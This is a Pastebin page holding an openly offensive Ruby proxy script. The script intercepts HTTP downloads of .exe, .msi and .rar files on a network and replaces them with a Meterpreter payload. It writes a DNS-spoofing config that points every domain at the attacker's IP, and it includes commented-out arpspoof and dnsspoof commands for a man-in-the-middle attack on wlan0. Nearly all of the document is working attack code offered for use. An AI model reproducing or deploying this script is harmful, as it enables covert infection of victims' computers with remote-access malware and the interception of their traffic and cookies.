Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #sudo ruby proxy.rb port
- #sudo ruby proxy.rb 666
- #sudo is need for opening a socket
- require 'eventmachine' #must install eventeventmachine
- prox_port=ARGV[0]
- attacker_ip="192.168.0.2" #local host
- meterpreter="/tmp/meterpreter" # search this script and replace /home/bigmac/tmp/meterpreter
- #meterpreter.EXE meterpreter.MSI meterpreter.RAR meterpreter.ZIP
- #if the meterpreter exist with the file extension the client is attempting to download then the switch will be made
- dns = File.open("dns.conf", "w+") # set up for dns spoofing domains to this proxy
- dns.write("#{attacker_ip} *.*")# this is your ip,
- dns.close
- # uncommment these lines when you want to use arpsoof/dns
- #victim="192.168.1.111"
- #gateway="192.168.1.1"
- #`pkill spoof`
- #a=Thread.new{system"xterm -e 'arpspoof -i wlan0 -t #{victim} #{gateway}'"}
- #c=Thread.new{system"xterm -e 'arpspoof -i wlan0 -t #{gateway} #{victim}'"}
- #b=Thread.new{system"xterm -e 'dnsspoof -i wlan0 -f dns.conf'"}
- #a.run
- #b.run
- #c.run
- Thread.start{
- class Client < EM::Connection
- def initialize(other, finger, *args, &blk)
- @other, @finger = other, finger
- super(*args, &blk)
- end
- def post_init
- @payload_extension=""
- send_data @finger.sub("Accept-Encoding:","Assept-Ensoding:") #send a get request, but disable encoding gzip
- for x in [".exe",".rar",".msi"]# payload format list, checking for file extension... add more of these to the list
- extension_check=@finger.scan(/#{x}/).to_s
- if extension_check.length>1
- @payload_extension<<extension_check
- end
- end
- if @payload_extension.length==0
- @payload_extension=""
- end
- end
- #Content-Type: application/x-msdos-program
- #Content-Type: application/x-msdownload
- #Content-Type: application/octet-stream
- #Content-Type: application/x-msihttp://www.i8igmac.tk/file.exe
- #Content-Type: application/x-rar
- #Content-Type: application/octet-stream
- #a list of possable application download... maybe check the GET request for jar? exe? msi? rar?
- def receive_data(response) # this is the part that the web client will see... change with evil code
- clength = response.scan(/Content-Length: \d+/).to_s.sub("Content-Length: ","")
- if response.scan("Content-Length: ").to_s == "Content-Length: " # if true
- if @payload_extension.length>1 # if true
- for trigger in ["application/x-msdos-program","application/x-msdownload","application/octet-stream","application/x-msi","applictation/x-rar","application/rar","application/octet-stream"] # add more triggers to this list
- if response.scan("#{trigger}").to_s.length>1 # if string is found, trigger
- if File.exists?("/tmp/meterpreter#{@payload_extension.downcase}")#= true
- puts " injecting #{@payload_extension} SUCCESS"#we need to check if payload exist and use this extension
- payload=File.read("/tmp/meterpreter#{@payload_extension.downcase}")#if the payload does not exist then this will break the script
- headers,body = response.split("\r\n\r\n", 2)
- @other.send_data headers.gsub(clength,payload.length.to_s)+"\r\n\r\n"+payload
- else
- puts "payload does not exist? meterpreter#{@payload_extension} sending unmodified data"
- end
- end
- end #start for trigger loop
- end#start of if payload extension.length
- end
- @other.send_data response
- #if no injection was found, send the unmodifi we pass to the webbrowsered response to the client
- end
- end
- #browser open to http://192.168.1.114
- module EchoServer
- def receive_data(finger) #finger is the header recived from the client, could log these cookies or log these pages
- ping = finger.gsub(" ","").index("Host:")
- pong = finger.gsub(" ","").index("\n",ping)
- host = finger.gsub(" ","")[ping..pong].gsub("Host:","").chomp #old method for gathering the host: field... could shorten this
- #i dont know if this will prevent loading from cache
- data=finger.sub("If-None-Match:","If-None-MutXX:").sub("If-Modified-Since:","If-Modified-SXnce:")
- EventMachine::connect host, 80, Client, self, data # ask google for response...
- end
- end
- }
- EventMachine::run {
- EventMachine::start_server attacker_ip, prox_port, EchoServer
- } # YOUR IP
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement